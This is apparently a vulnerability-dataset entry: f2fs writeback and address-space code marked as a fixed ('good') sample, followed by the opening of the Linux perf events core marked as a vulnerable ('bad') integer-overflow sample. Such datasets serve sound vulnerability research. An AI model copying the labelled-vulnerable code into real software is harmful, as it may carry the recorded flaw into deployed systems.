if (page->index > end) {
done = 1;
break;
}
done_index = page->index;
lock_page(page);
if (unlikely(page->mapping != mapping)) {
continue_unlock:
unlock_page(page);
continue;
}
if (!PageDirty(page)) {
/* someone wrote it for us */
goto continue_unlock;
}
if (PageWriteback(page)) {
if (wbc->sync_mode != WB_SYNC_NONE)
f2fs_wait_on_page_writeback(page,
DATA, true);
else
goto continue_unlock;
}
BUG_ON(PageWriteback(page));
if (!clear_page_dirty_for_io(page))
goto continue_unlock;
ret = mapping->a_ops->writepage(page, wbc);
if (unlikely(ret)) {
/*
* keep nr_to_write, since vfs uses this to
* get # of written pages.
*/
if (ret == AOP_WRITEPAGE_ACTIVATE) {
unlock_page(page);
ret = 0;
continue;
}
done_index = page->index + 1;
done = 1;
break;
} else {
nwritten++;
}
if (--wbc->nr_to_write <= 0 &&
wbc->sync_mode == WB_SYNC_NONE) {
done = 1;
break;
}
}
pagevec_release(&pvec);
cond_resched();
}
if (!cycled && !done) {
cycled = 1;
index = 0;
end = writeback_index - 1;
goto retry;
}
if (wbc->range_cyclic || (range_whole && wbc->nr_to_write > 0))
mapping->writeback_index = done_index;
if (nwritten)
f2fs_submit_merged_bio_cond(F2FS_M_SB(mapping), mapping->host,
NULL, 0, DATA, WRITE);
return ret;
}
static int f2fs_write_data_pages(struct address_space *mapping,
struct writeback_control *wbc)
{
struct inode *inode = mapping->host;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
struct blk_plug plug;
int ret;
/* deal with chardevs and other special file */
if (!mapping->a_ops->writepage)
return 0;
/* skip writing if there is no dirty page in this inode */
if (!get_dirty_pages(inode) && wbc->sync_mode == WB_SYNC_NONE)
return 0;
if (S_ISDIR(inode->i_mode) && wbc->sync_mode == WB_SYNC_NONE &&
get_dirty_pages(inode) < nr_pages_to_skip(sbi, DATA) &&
available_free_memory(sbi, DIRTY_DENTS))
goto skip_write;
/* skip writing during file defragment */
if (is_inode_flag_set(inode, FI_DO_DEFRAG))
goto skip_write;
/* during POR, we don't need to trigger writepage at all. */
if (unlikely(is_sbi_flag_set(sbi, SBI_POR_DOING)))
goto skip_write;
trace_f2fs_writepages(mapping->host, wbc, DATA);
blk_start_plug(&plug);
ret = f2fs_write_cache_pages(mapping, wbc);
blk_finish_plug(&plug);
/*
* if some pages were truncated, we cannot guarantee its mapping->host
* to detect pending bios.
*/
remove_dirty_inode(inode);
return ret;
skip_write:
wbc->pages_skipped += get_dirty_pages(inode);
trace_f2fs_writepages(mapping->host, wbc, DATA);
return 0;
}
static void f2fs_write_failed(struct address_space *mapping, loff_t to)
{
struct inode *inode = mapping->host;
loff_t i_size = i_size_read(inode);
if (to > i_size) {
truncate_pagecache(inode, i_size);
truncate_blocks(inode, i_size, true);
}
}
static int prepare_write_begin(struct f2fs_sb_info *sbi,
struct page *page, loff_t pos, unsigned len,
block_t *blk_addr, bool *node_changed)
{
struct inode *inode = page->mapping->host;
pgoff_t index = page->index;
struct dnode_of_data dn;
struct page *ipage;
bool locked = false;
struct extent_info ei;
int err = 0;
/*
* we already allocated all the blocks, so we don't need to get
* the block addresses when there is no need to fill the page.
*/
if (!f2fs_has_inline_data(inode) && len == PAGE_SIZE &&
!is_inode_flag_set(inode, FI_NO_PREALLOC))
return 0;
if (f2fs_has_inline_data(inode) ||
(pos & PAGE_MASK) >= i_size_read(inode)) {
f2fs_lock_op(sbi);
locked = true;
}
restart:
/* check inline_data */
ipage = get_node_page(sbi, inode->i_ino);
if (IS_ERR(ipage)) {
err = PTR_ERR(ipage);
goto unlock_out;
}
set_new_dnode(&dn, inode, ipage, ipage, 0);
if (f2fs_has_inline_data(inode)) {
if (pos + len <= MAX_INLINE_DATA) {
read_inline_data(page, ipage);
set_inode_flag(inode, FI_DATA_EXIST);
if (inode->i_nlink)
set_inline_node(ipage);
} else {
err = f2fs_convert_inline_page(&dn, page);
if (err)
goto out;
if (dn.data_blkaddr == NULL_ADDR)
err = f2fs_get_block(&dn, index);
}
} else if (locked) {
err = f2fs_get_block(&dn, index);
} else {
if (f2fs_lookup_extent_cache(inode, index, &ei)) {
dn.data_blkaddr = ei.blk + index - ei.fofs;
} else {
/* hole case */
err = get_dnode_of_data(&dn, index, LOOKUP_NODE);
if (err || dn.data_blkaddr == NULL_ADDR) {
f2fs_put_dnode(&dn);
f2fs_lock_op(sbi);
locked = true;
goto restart;
}
}
}
/* convert_inline_page can make node_changed */
*blk_addr = dn.data_blkaddr;
*node_changed = dn.node_changed;
out:
f2fs_put_dnode(&dn);
unlock_out:
if (locked)
f2fs_unlock_op(sbi);
return err;
}
static int f2fs_write_begin(struct file *file, struct address_space *mapping,
loff_t pos, unsigned len, unsigned flags,
struct page **pagep, void **fsdata)
{
struct inode *inode = mapping->host;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
struct page *page = NULL;
pgoff_t index = ((unsigned long long) pos) >> PAGE_SHIFT;
bool need_balance = false;
block_t blkaddr = NULL_ADDR;
int err = 0;
trace_f2fs_write_begin(inode, pos, len, flags);
/*
* We should check this at this moment to avoid deadlock on inode page
* and #0 page. The locking rule for inline_data conversion should be:
* lock_page(page #0) -> lock_page(inode_page)
*/
if (index != 0) {
err = f2fs_convert_inline_inode(inode);
if (err)
goto fail;
}
repeat:
page = grab_cache_page_write_begin(mapping, index, flags);
if (!page) {
err = -ENOMEM;
goto fail;
}
*pagep = page;
err = prepare_write_begin(sbi, page, pos, len,
&blkaddr, &need_balance);
if (err)
goto fail;
if (need_balance && has_not_enough_free_secs(sbi, 0, 0)) {
unlock_page(page);
f2fs_balance_fs(sbi, true);
lock_page(page);
if (page->mapping != mapping) {
/* The page got truncated from under us */
f2fs_put_page(page, 1);
goto repeat;
}
}
f2fs_wait_on_page_writeback(page, DATA, false);
/* wait for GCed encrypted page writeback */
if (f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode))
f2fs_wait_on_encrypted_page_writeback(sbi, blkaddr);
if (len == PAGE_SIZE || PageUptodate(page))
return 0;
if (!(pos & (PAGE_SIZE - 1)) && (pos + len) >= i_size_read(inode)) {
zero_user_segment(page, len, PAGE_SIZE);
return 0;
}
if (blkaddr == NEW_ADDR) {
zero_user_segment(page, 0, PAGE_SIZE);
SetPageUptodate(page);
} else {
struct bio *bio;
bio = f2fs_grab_bio(inode, blkaddr, 1);
if (IS_ERR(bio)) {
err = PTR_ERR(bio);
goto fail;
}
bio->bi_opf = REQ_OP_READ;
if (bio_add_page(bio, page, PAGE_SIZE, 0) < PAGE_SIZE) {
bio_put(bio);
err = -EFAULT;
goto fail;
}
__submit_bio(sbi, bio, DATA);
lock_page(page);
if (unlikely(page->mapping != mapping)) {
f2fs_put_page(page, 1);
goto repeat;
}
if (unlikely(!PageUptodate(page))) {
err = -EIO;
goto fail;
}
}
return 0;
fail:
f2fs_put_page(page, 1);
f2fs_write_failed(mapping, pos + len);
return err;
}
static int f2fs_write_end(struct file *file,
struct address_space *mapping,
loff_t pos, unsigned len, unsigned copied,
struct page *page, void *fsdata)
{
struct inode *inode = page->mapping->host;
trace_f2fs_write_end(inode, pos, len, copied);
/*
* This should be come from len == PAGE_SIZE, and we expect copied
* should be PAGE_SIZE. Otherwise, we treat it with zero copied and
* let generic_perform_write() try to copy data again through copied=0.
*/
if (!PageUptodate(page)) {
if (unlikely(copied != len))
copied = 0;
else
SetPageUptodate(page);
}
if (!copied)
goto unlock_out;
set_page_dirty(page);
if (pos + copied > i_size_read(inode))
f2fs_i_size_write(inode, pos + copied);
unlock_out:
f2fs_put_page(page, 1);
f2fs_update_time(F2FS_I_SB(inode), REQ_TIME);
return copied;
}
static int check_direct_IO(struct inode *inode, struct iov_iter *iter,
loff_t offset)
{
unsigned blocksize_mask = inode->i_sb->s_blocksize - 1;
if (offset & blocksize_mask)
return -EINVAL;
if (iov_iter_alignment(iter) & blocksize_mask)
return -EINVAL;
return 0;
}
static ssize_t f2fs_direct_IO(struct kiocb *iocb, struct iov_iter *iter)
{
struct address_space *mapping = iocb->ki_filp->f_mapping;
struct inode *inode = mapping->host;
size_t count = iov_iter_count(iter);
loff_t offset = iocb->ki_pos;
int rw = iov_iter_rw(iter);
int err;
err = check_direct_IO(inode, iter, offset);
if (err)
return err;
if (__force_buffered_io(inode, rw))
return 0;
trace_f2fs_direct_IO_enter(inode, offset, count, rw);
down_read(&F2FS_I(inode)->dio_rwsem[rw]);
err = blockdev_direct_IO(iocb, inode, iter, get_data_block_dio);
up_read(&F2FS_I(inode)->dio_rwsem[rw]);
if (rw == WRITE) {
if (err > 0)
set_inode_flag(inode, FI_UPDATE_WRITE);
else if (err < 0)
f2fs_write_failed(mapping, offset + count);
}
trace_f2fs_direct_IO_exit(inode, offset, count, rw, err);
return err;
}
void f2fs_invalidate_page(struct page *page, unsigned int offset,
unsigned int length)
{
struct inode *inode = page->mapping->host;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
if (inode->i_ino >= F2FS_ROOT_INO(sbi) &&
(offset % PAGE_SIZE || length != PAGE_SIZE))
return;
if (PageDirty(page)) {
if (inode->i_ino == F2FS_META_INO(sbi)) {
dec_page_count(sbi, F2FS_DIRTY_META);
} else if (inode->i_ino == F2FS_NODE_INO(sbi)) {
dec_page_count(sbi, F2FS_DIRTY_NODES);
} else {
inode_dec_dirty_pages(inode);
remove_dirty_inode(inode);
}
}
/* This is atomic written page, keep Private */
if (IS_ATOMIC_WRITTEN_PAGE(page))
return;
set_page_private(page, 0);
ClearPagePrivate(page);
}
int f2fs_release_page(struct page *page, gfp_t wait)
{
/* If this is dirty page, keep PagePrivate */
if (PageDirty(page))
return 0;
/* This is atomic written page, keep Private */
if (IS_ATOMIC_WRITTEN_PAGE(page))
return 0;
set_page_private(page, 0);
ClearPagePrivate(page);
return 1;
}
/*
* This was copied from __set_page_dirty_buffers which gives higher performance
* in very high speed storages. (e.g., pmem)
*/
void f2fs_set_page_dirty_nobuffers(struct page *page)
{
struct address_space *mapping = page->mapping;
unsigned long flags;
if (unlikely(!mapping))
return;
spin_lock(&mapping->private_lock);
lock_page_memcg(page);
SetPageDirty(page);
spin_unlock(&mapping->private_lock);
spin_lock_irqsave(&mapping->tree_lock, flags);
WARN_ON_ONCE(!PageUptodate(page));
account_page_dirtied(page, mapping);
radix_tree_tag_set(&mapping->page_tree,
page_index(page), PAGECACHE_TAG_DIRTY);
spin_unlock_irqrestore(&mapping->tree_lock, flags);
unlock_page_memcg(page);
__mark_inode_dirty(mapping->host, I_DIRTY_PAGES);
return;
}
static int f2fs_set_data_page_dirty(struct page *page)
{
struct address_space *mapping = page->mapping;
struct inode *inode = mapping->host;
trace_f2fs_set_page_dirty(page, DATA);
if (!PageUptodate(page))
SetPageUptodate(page);
if (f2fs_is_atomic_file(inode) && !f2fs_is_commit_atomic_write(inode)) {
if (!IS_ATOMIC_WRITTEN_PAGE(page)) {
register_inmem_page(inode, page);
return 1;
}
/*
* Previously, this page has been registered, we just
* return here.
*/
return 0;
}
if (!PageDirty(page)) {
f2fs_set_page_dirty_nobuffers(page);
update_dirty_page(inode, page);
return 1;
}
return 0;
}
static sector_t f2fs_bmap(struct address_space *mapping, sector_t block)
{
struct inode *inode = mapping->host;
if (f2fs_has_inline_data(inode))
return 0;
/* make sure allocating whole blocks */
if (mapping_tagged(mapping, PAGECACHE_TAG_DIRTY))
filemap_write_and_wait(mapping);
return generic_block_bmap(mapping, block, get_data_block_bmap);
}
#ifdef CONFIG_MIGRATION
#include <linux/migrate.h>
int f2fs_migrate_page(struct address_space *mapping,
struct page *newpage, struct page *page, enum migrate_mode mode)
{
int rc, extra_count;
struct f2fs_inode_info *fi = F2FS_I(mapping->host);
bool atomic_written = IS_ATOMIC_WRITTEN_PAGE(page);
BUG_ON(PageWriteback(page));
/* migrating an atomic written page is safe with the inmem_lock hold */
if (atomic_written && !mutex_trylock(&fi->inmem_lock))
return -EAGAIN;
/*
* A reference is expected if PagePrivate set when move mapping,
* however F2FS breaks this for maintaining dirty page counts when
* truncating pages. So here adjusting the 'extra_count' make it work.
*/
extra_count = (atomic_written ? 1 : 0) - page_has_private(page);
rc = migrate_page_move_mapping(mapping, newpage,
page, NULL, mode, extra_count);
if (rc != MIGRATEPAGE_SUCCESS) {
if (atomic_written)
mutex_unlock(&fi->inmem_lock);
return rc;
}
if (atomic_written) {
struct inmem_pages *cur;
list_for_each_entry(cur, &fi->inmem_pages, list)
if (cur->page == page) {
cur->page = newpage;
break;
}
mutex_unlock(&fi->inmem_lock);
put_page(page);
get_page(newpage);
}
if (PagePrivate(page))
SetPagePrivate(newpage);
set_page_private(newpage, page_private(page));
migrate_page_copy(newpage, page);
return MIGRATEPAGE_SUCCESS;
}
#endif
const struct address_space_operations f2fs_dblock_aops = {
.readpage = f2fs_read_data_page,
.readpages = f2fs_read_data_pages,
.writepage = f2fs_write_data_page,
.writepages = f2fs_write_data_pages,
.write_begin = f2fs_write_begin,
.write_end = f2fs_write_end,
.set_page_dirty = f2fs_set_data_page_dirty,
.invalidatepage = f2fs_invalidate_page,
.releasepage = f2fs_release_page,
.direct_IO = f2fs_direct_IO,
.bmap = f2fs_bmap,
#ifdef CONFIG_MIGRATION
.migratepage = f2fs_migrate_page,
#endif
};
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_3028_0 |
crossvul-cpp_data_bad_3027_0 | /*
* Performance events core code:
*
* Copyright (C) 2008 Thomas Gleixner <tglx@linutronix.de>
* Copyright (C) 2008-2011 Red Hat, Inc., Ingo Molnar
* Copyright (C) 2008-2011 Red Hat, Inc., Peter Zijlstra
* Copyright © 2009 Paul Mackerras, IBM Corp. <paulus@au1.ibm.com>
*
* For licensing details see kernel-base/COPYING
*/
#include <linux/fs.h>
#include <linux/mm.h>
#include <linux/cpu.h>
#include <linux/smp.h>
#include <linux/idr.h>
#include <linux/file.h>
#include <linux/poll.h>
#include <linux/slab.h>
#include <linux/hash.h>
#include <linux/tick.h>
#include <linux/sysfs.h>
#include <linux/dcache.h>
#include <linux/percpu.h>
#include <linux/ptrace.h>
#include <linux/reboot.h>
#include <linux/vmstat.h>
#include <linux/device.h>
#include <linux/export.h>
#include <linux/vmalloc.h>
#include <linux/hardirq.h>
#include <linux/rculist.h>
#include <linux/uaccess.h>
#include <linux/syscalls.h>
#include <linux/anon_inodes.h>
#include <linux/kernel_stat.h>
#include <linux/cgroup.h>
#include <linux/perf_event.h>
#include <linux/trace_events.h>
#include <linux/hw_breakpoint.h>
#include <linux/mm_types.h>
#include <linux/module.h>
#include <linux/mman.h>
#include <linux/compat.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#include <linux/namei.h>
#include <linux/parser.h>
#include "internal.h"
#include <asm/irq_regs.h>
typedef int (*remote_function_f)(void *);
struct remote_function_call {
struct task_struct *p;
remote_function_f func;
void *info;
int ret;
};
static void remote_function(void *data)
{
struct remote_function_call *tfc = data;
struct task_struct *p = tfc->p;
if (p) {
/* -EAGAIN */
if (task_cpu(p) != smp_processor_id())
return;
/*
* Now that we're on right CPU with IRQs disabled, we can test
* if we hit the right task without races.
*/
tfc->ret = -ESRCH; /* No such (running) process */
if (p != current)
return;
}
tfc->ret = tfc->func(tfc->info);
}
/**
* task_function_call - call a function on the cpu on which a task runs
* @p: the task to evaluate
* @func: the function to be called
* @info: the function call argument
*
* Calls the function @func when the task is currently running. This might
* be on the current CPU, which just calls the function directly
*
* returns: @func return value, or
* -ESRCH - when the process isn't running
* -EAGAIN - when the process moved away
*/
static int
task_function_call(struct task_struct *p, remote_function_f func, void *info)
{
struct remote_function_call data = {
.p = p,
.func = func,
.info = info,
.ret = -EAGAIN,
};
int ret;
do {
ret = smp_call_function_single(task_cpu(p), remote_function, &data, 1);
if (!ret)
ret = data.ret;
} while (ret == -EAGAIN);
return ret;
}
/**
* cpu_function_call - call a function on the cpu
* @func: the function to be called
* @info: the function call argument
*
* Calls the function @func on the remote cpu.
*
* returns: @func return value or -ENXIO when the cpu is offline
*/
static int cpu_function_call(int cpu, remote_function_f func, void *info)
{
struct remote_function_call data = {
.p = NULL,
.func = func,
.info = info,
.ret = -ENXIO, /* No such CPU */
};
smp_call_function_single(cpu, remote_function, &data, 1);
return data.ret;
}
static inline struct perf_cpu_context *
__get_cpu_context(struct perf_event_context *ctx)
{
return this_cpu_ptr(ctx->pmu->pmu_cpu_context);
}
static void perf_ctx_lock(struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx)
{
raw_spin_lock(&cpuctx->ctx.lock);
if (ctx)
raw_spin_lock(&ctx->lock);
}
static void perf_ctx_unlock(struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx)
{
if (ctx)
raw_spin_unlock(&ctx->lock);
raw_spin_unlock(&cpuctx->ctx.lock);
}
#define TASK_TOMBSTONE ((void *)-1L)
static bool is_kernel_event(struct perf_event *event)
{
return READ_ONCE(event->owner) == TASK_TOMBSTONE;
}
/*
* On task ctx scheduling...
*
* When !ctx->nr_events a task context will not be scheduled. This means
* we can disable the scheduler hooks (for performance) without leaving
* pending task ctx state.
*
* This however results in two special cases:
*
* - removing the last event from a task ctx; this is relatively straight
* forward and is done in __perf_remove_from_context.
*
* - adding the first event to a task ctx; this is tricky because we cannot
* rely on ctx->is_active and therefore cannot use event_function_call().
* See perf_install_in_context().
*
* If ctx->nr_events, then ctx->is_active and cpuctx->task_ctx are set.
*/
typedef void (*event_f)(struct perf_event *, struct perf_cpu_context *,
struct perf_event_context *, void *);
struct event_function_struct {
struct perf_event *event;
event_f func;
void *data;
};
static int event_function(void *info)
{
struct event_function_struct *efs = info;
struct perf_event *event = efs->event;
struct perf_event_context *ctx = event->ctx;
struct perf_cpu_context *cpuctx = __get_cpu_context(ctx);
struct perf_event_context *task_ctx = cpuctx->task_ctx;
int ret = 0;
WARN_ON_ONCE(!irqs_disabled());
perf_ctx_lock(cpuctx, task_ctx);
/*
* Since we do the IPI call without holding ctx->lock things can have
* changed, double check we hit the task we set out to hit.
*/
if (ctx->task) {
if (ctx->task != current) {
ret = -ESRCH;
goto unlock;
}
/*
* We only use event_function_call() on established contexts,
* and event_function() is only ever called when active (or
* rather, we'll have bailed in task_function_call() or the
* above ctx->task != current test), therefore we must have
* ctx->is_active here.
*/
WARN_ON_ONCE(!ctx->is_active);
/*
* And since we have ctx->is_active, cpuctx->task_ctx must
* match.
*/
WARN_ON_ONCE(task_ctx != ctx);
} else {
WARN_ON_ONCE(&cpuctx->ctx != ctx);
}
efs->func(event, cpuctx, ctx, efs->data);
unlock:
perf_ctx_unlock(cpuctx, task_ctx);
return ret;
}
static void event_function_call(struct perf_event *event, event_f func, void *data)
{
struct perf_event_context *ctx = event->ctx;
struct task_struct *task = READ_ONCE(ctx->task); /* verified in event_function */
struct event_function_struct efs = {
.event = event,
.func = func,
.data = data,
};
if (!event->parent) {
/*
* If this is a !child event, we must hold ctx::mutex to
* stabilize the the event->ctx relation. See
* perf_event_ctx_lock().
*/
lockdep_assert_held(&ctx->mutex);
}
if (!task) {
cpu_function_call(event->cpu, event_function, &efs);
return;
}
if (task == TASK_TOMBSTONE)
return;
again:
if (!task_function_call(task, event_function, &efs))
return;
raw_spin_lock_irq(&ctx->lock);
/*
* Reload the task pointer, it might have been changed by
* a concurrent perf_event_context_sched_out().
*/
task = ctx->task;
if (task == TASK_TOMBSTONE) {
raw_spin_unlock_irq(&ctx->lock);
return;
}
if (ctx->is_active) {
raw_spin_unlock_irq(&ctx->lock);
goto again;
}
func(event, NULL, ctx, data);
raw_spin_unlock_irq(&ctx->lock);
}
/*
* Similar to event_function_call() + event_function(), but hard assumes IRQs
* are already disabled and we're on the right CPU.
*/
static void event_function_local(struct perf_event *event, event_f func, void *data)
{
struct perf_event_context *ctx = event->ctx;
struct perf_cpu_context *cpuctx = __get_cpu_context(ctx);
struct task_struct *task = READ_ONCE(ctx->task);
struct perf_event_context *task_ctx = NULL;
WARN_ON_ONCE(!irqs_disabled());
if (task) {
if (task == TASK_TOMBSTONE)
return;
task_ctx = ctx;
}
perf_ctx_lock(cpuctx, task_ctx);
task = ctx->task;
if (task == TASK_TOMBSTONE)
goto unlock;
if (task) {
/*
* We must be either inactive or active and the right task,
* otherwise we're screwed, since we cannot IPI to somewhere
* else.
*/
if (ctx->is_active) {
if (WARN_ON_ONCE(task != current))
goto unlock;
if (WARN_ON_ONCE(cpuctx->task_ctx != ctx))
goto unlock;
}
} else {
WARN_ON_ONCE(&cpuctx->ctx != ctx);
}
func(event, cpuctx, ctx, data);
unlock:
perf_ctx_unlock(cpuctx, task_ctx);
}
#define PERF_FLAG_ALL (PERF_FLAG_FD_NO_GROUP |\
PERF_FLAG_FD_OUTPUT |\
PERF_FLAG_PID_CGROUP |\
PERF_FLAG_FD_CLOEXEC)
/*
* branch priv levels that need permission checks
*/
#define PERF_SAMPLE_BRANCH_PERM_PLM \
(PERF_SAMPLE_BRANCH_KERNEL |\
PERF_SAMPLE_BRANCH_HV)
enum event_type_t {
EVENT_FLEXIBLE = 0x1,
EVENT_PINNED = 0x2,
EVENT_TIME = 0x4,
/* see ctx_resched() for details */
EVENT_CPU = 0x8,
EVENT_ALL = EVENT_FLEXIBLE | EVENT_PINNED,
};
/*
* perf_sched_events : >0 events exist
* perf_cgroup_events: >0 per-cpu cgroup events exist on this cpu
*/
static void perf_sched_delayed(struct work_struct *work);
DEFINE_STATIC_KEY_FALSE(perf_sched_events);
static DECLARE_DELAYED_WORK(perf_sched_work, perf_sched_delayed);
static DEFINE_MUTEX(perf_sched_mutex);
static atomic_t perf_sched_count;
static DEFINE_PER_CPU(atomic_t, perf_cgroup_events);
static DEFINE_PER_CPU(int, perf_sched_cb_usages);
static DEFINE_PER_CPU(struct pmu_event_list, pmu_sb_events);
static atomic_t nr_mmap_events __read_mostly;
static atomic_t nr_comm_events __read_mostly;
static atomic_t nr_task_events __read_mostly;
static atomic_t nr_freq_events __read_mostly;
static atomic_t nr_switch_events __read_mostly;
static LIST_HEAD(pmus);
static DEFINE_MUTEX(pmus_lock);
static struct srcu_struct pmus_srcu;
/*
* perf event paranoia level:
* -1 - not paranoid at all
* 0 - disallow raw tracepoint access for unpriv
* 1 - disallow cpu events for unpriv
* 2 - disallow kernel profiling for unpriv
*/
int sysctl_perf_event_paranoid __read_mostly = 2;
/* Minimum for 512 kiB + 1 user control page */
int sysctl_perf_event_mlock __read_mostly = 512 + (PAGE_SIZE / 1024); /* 'free' kiB per user */
/*
* max perf event sample rate
*/
#define DEFAULT_MAX_SAMPLE_RATE 100000
#define DEFAULT_SAMPLE_PERIOD_NS (NSEC_PER_SEC / DEFAULT_MAX_SAMPLE_RATE)
#define DEFAULT_CPU_TIME_MAX_PERCENT 25
int sysctl_perf_event_sample_rate __read_mostly = DEFAULT_MAX_SAMPLE_RATE;
static int max_samples_per_tick __read_mostly = DIV_ROUND_UP(DEFAULT_MAX_SAMPLE_RATE, HZ);
static int perf_sample_period_ns __read_mostly = DEFAULT_SAMPLE_PERIOD_NS;
static int perf_sample_allowed_ns __read_mostly =
DEFAULT_SAMPLE_PERIOD_NS * DEFAULT_CPU_TIME_MAX_PERCENT / 100;
static void update_perf_cpu_limits(void)
{
u64 tmp = perf_sample_period_ns;
tmp *= sysctl_perf_cpu_time_max_percent;
tmp = div_u64(tmp, 100);
if (!tmp)
tmp = 1;
WRITE_ONCE(perf_sample_allowed_ns, tmp);
}
static int perf_rotate_context(struct perf_cpu_context *cpuctx);
int perf_proc_update_handler(struct ctl_table *table, int write,
void __user *buffer, size_t *lenp,
loff_t *ppos)
{
int ret = proc_dointvec_minmax(table, write, buffer, lenp, ppos);
if (ret || !write)
return ret;
/*
* If throttling is disabled don't allow the write:
*/
if (sysctl_perf_cpu_time_max_percent == 100 ||
sysctl_perf_cpu_time_max_percent == 0)
return -EINVAL;
max_samples_per_tick = DIV_ROUND_UP(sysctl_perf_event_sample_rate, HZ);
perf_sample_period_ns = NSEC_PER_SEC / sysctl_perf_event_sample_rate;
update_perf_cpu_limits();
return 0;
}
int sysctl_perf_cpu_time_max_percent __read_mostly = DEFAULT_CPU_TIME_MAX_PERCENT;
int perf_cpu_time_max_percent_handler(struct ctl_table *table, int write,
void __user *buffer, size_t *lenp,
loff_t *ppos)
{
int ret = proc_dointvec(table, write, buffer, lenp, ppos);
if (ret || !write)
return ret;
if (sysctl_perf_cpu_time_max_percent == 100 ||
sysctl_perf_cpu_time_max_percent == 0) {
printk(KERN_WARNING
"perf: Dynamic interrupt throttling disabled, can hang your system!\n");
WRITE_ONCE(perf_sample_allowed_ns, 0);
} else {
update_perf_cpu_limits();
}
return 0;
}
/*
* perf samples are done in some very critical code paths (NMIs).
* If they take too much CPU time, the system can lock up and not
* get any real work done. This will drop the sample rate when
* we detect that events are taking too long.
*/
#define NR_ACCUMULATED_SAMPLES 128
static DEFINE_PER_CPU(u64, running_sample_length);
static u64 __report_avg;
static u64 __report_allowed;
static void perf_duration_warn(struct irq_work *w)
{
printk_ratelimited(KERN_INFO
"perf: interrupt took too long (%lld > %lld), lowering "
"kernel.perf_event_max_sample_rate to %d\n",
__report_avg, __report_allowed,
sysctl_perf_event_sample_rate);
}
static DEFINE_IRQ_WORK(perf_duration_work, perf_duration_warn);
void perf_sample_event_took(u64 sample_len_ns)
{
u64 max_len = READ_ONCE(perf_sample_allowed_ns);
u64 running_len;
u64 avg_len;
u32 max;
if (max_len == 0)
return;
/* Decay the counter by 1 average sample. */
running_len = __this_cpu_read(running_sample_length);
running_len -= running_len/NR_ACCUMULATED_SAMPLES;
running_len += sample_len_ns;
__this_cpu_write(running_sample_length, running_len);
/*
* Note: this will be biased artifically low until we have
* seen NR_ACCUMULATED_SAMPLES. Doing it this way keeps us
* from having to maintain a count.
*/
avg_len = running_len/NR_ACCUMULATED_SAMPLES;
if (avg_len <= max_len)
return;
__report_avg = avg_len;
__report_allowed = max_len;
/*
* Compute a throttle threshold 25% below the current duration.
*/
avg_len += avg_len / 4;
max = (TICK_NSEC / 100) * sysctl_perf_cpu_time_max_percent;
if (avg_len < max)
max /= (u32)avg_len;
else
max = 1;
WRITE_ONCE(perf_sample_allowed_ns, avg_len);
WRITE_ONCE(max_samples_per_tick, max);
sysctl_perf_event_sample_rate = max * HZ;
perf_sample_period_ns = NSEC_PER_SEC / sysctl_perf_event_sample_rate;
if (!irq_work_queue(&perf_duration_work)) {
early_printk("perf: interrupt took too long (%lld > %lld), lowering "
"kernel.perf_event_max_sample_rate to %d\n",
__report_avg, __report_allowed,
sysctl_perf_event_sample_rate);
}
}
static atomic64_t perf_event_id;
static void cpu_ctx_sched_out(struct perf_cpu_context *cpuctx,
enum event_type_t event_type);
static void cpu_ctx_sched_in(struct perf_cpu_context *cpuctx,
enum event_type_t event_type,
struct task_struct *task);
static void update_context_time(struct perf_event_context *ctx);
static u64 perf_event_time(struct perf_event *event);
void __weak perf_event_print_debug(void) { }
extern __weak const char *perf_pmu_name(void)
{
return "pmu";
}
static inline u64 perf_clock(void)
{
return local_clock();
}
static inline u64 perf_event_clock(struct perf_event *event)
{
return event->clock();
}
#ifdef CONFIG_CGROUP_PERF
static inline bool
perf_cgroup_match(struct perf_event *event)
{
struct perf_event_context *ctx = event->ctx;
struct perf_cpu_context *cpuctx = __get_cpu_context(ctx);
/* @event doesn't care about cgroup */
if (!event->cgrp)
return true;
/* wants specific cgroup scope but @cpuctx isn't associated with any */
if (!cpuctx->cgrp)
return false;
/*
* Cgroup scoping is recursive. An event enabled for a cgroup is
* also enabled for all its descendant cgroups. If @cpuctx's
* cgroup is a descendant of @event's (the test covers identity
* case), it's a match.
*/
return cgroup_is_descendant(cpuctx->cgrp->css.cgroup,
event->cgrp->css.cgroup);
}
static inline void perf_detach_cgroup(struct perf_event *event)
{
css_put(&event->cgrp->css);
event->cgrp = NULL;
}
static inline int is_cgroup_event(struct perf_event *event)
{
return event->cgrp != NULL;
}
static inline u64 perf_cgroup_event_time(struct perf_event *event)
{
struct perf_cgroup_info *t;
t = per_cpu_ptr(event->cgrp->info, event->cpu);
return t->time;
}
static inline void __update_cgrp_time(struct perf_cgroup *cgrp)
{
struct perf_cgroup_info *info;
u64 now;
now = perf_clock();
info = this_cpu_ptr(cgrp->info);
info->time += now - info->timestamp;
info->timestamp = now;
}
static inline void update_cgrp_time_from_cpuctx(struct perf_cpu_context *cpuctx)
{
struct perf_cgroup *cgrp_out = cpuctx->cgrp;
if (cgrp_out)
__update_cgrp_time(cgrp_out);
}
static inline void update_cgrp_time_from_event(struct perf_event *event)
{
struct perf_cgroup *cgrp;
/*
* ensure we access cgroup data only when needed and
* when we know the cgroup is pinned (css_get)
*/
if (!is_cgroup_event(event))
return;
cgrp = perf_cgroup_from_task(current, event->ctx);
/*
* Do not update time when cgroup is not active
*/
if (cgrp == event->cgrp)
__update_cgrp_time(event->cgrp);
}
static inline void
perf_cgroup_set_timestamp(struct task_struct *task,
struct perf_event_context *ctx)
{
struct perf_cgroup *cgrp;
struct perf_cgroup_info *info;
/*
* ctx->lock held by caller
* ensure we do not access cgroup data
* unless we have the cgroup pinned (css_get)
*/
if (!task || !ctx->nr_cgroups)
return;
cgrp = perf_cgroup_from_task(task, ctx);
info = this_cpu_ptr(cgrp->info);
info->timestamp = ctx->timestamp;
}
static DEFINE_PER_CPU(struct list_head, cgrp_cpuctx_list);
#define PERF_CGROUP_SWOUT 0x1 /* cgroup switch out every event */
#define PERF_CGROUP_SWIN 0x2 /* cgroup switch in events based on task */
/*
* reschedule events based on the cgroup constraint of task.
*
* mode SWOUT : schedule out everything
* mode SWIN : schedule in based on cgroup for next
*/
static void perf_cgroup_switch(struct task_struct *task, int mode)
{
struct perf_cpu_context *cpuctx;
struct list_head *list;
unsigned long flags;
/*
* Disable interrupts and preemption to avoid this CPU's
* cgrp_cpuctx_entry to change under us.
*/
